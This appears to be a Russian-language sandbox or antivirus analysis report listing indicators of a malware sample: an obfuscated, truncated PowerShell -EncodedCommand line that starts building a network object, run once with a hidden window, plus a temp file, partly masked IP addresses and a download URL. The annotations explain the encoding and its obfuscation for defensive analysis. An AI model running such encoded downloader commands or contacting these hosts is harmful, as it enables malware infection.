Техническая информация
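- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAHgAUQBRAEMAQQBrAEEAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAFEAJwAsACcAZgB4AGsAQQBBAFoAJwAsACcAQQAnACkAOwAkAFAAUQBBAEIAMQBVAEEAPQBOAGUAYABXAC0AYABvAEIASgBFAEMAVAAgACgAJwBOAGUAdAAnAC...
  (Параметр -e — сокращённая форма -EncodedCommand: аргумент представляет собой Base64 от текста команды в кодировке UTF-16LE и в отчёте обрезан. Видимая часть декодируется в «$jxQQCAkA=("{1}{2}{0}" -f'Q','fxkAAZ','A');$PQAB1UA=Ne`W-`oBJECT ('Net'» — строка собирается оператором форматирования -f, а имя New-Object разбито обратными апострофами, то есть команда обфусцирована. Полный текст такой команды можно получить из журнала PowerShell, событие 4104, если включено протоколирование блоков сценариев.)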
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1171676.cvr
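- '13#.#8.156.95':80
  (Здесь и ниже часть цифр в адресах, по-видимому, заменена в источнике символом «#»; в таком виде эти значения не годятся как точные индикаторы для блокировки или поиска.)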
- '16#.#27.169.67':80
- '35.##3.167.184':80
- '35.##2.76.64':80
- '10#.#78.221.225':80
- http://13#.#8.156.95/cm0dtam/x_fo/
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAHgAUQBRAEMAQQBrAEEAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAFEAJwAsACcAZgB4AGsAQQBBAFoAJwAsACcAQQAnACkAOwAkAFAAUQBBAEIAMQBVAEEAPQBOAGUAYABXAC0AYABvAEIASgBFAEMAVAAgACgAJwBOAGUAdAAnAC... (со скрытым окном)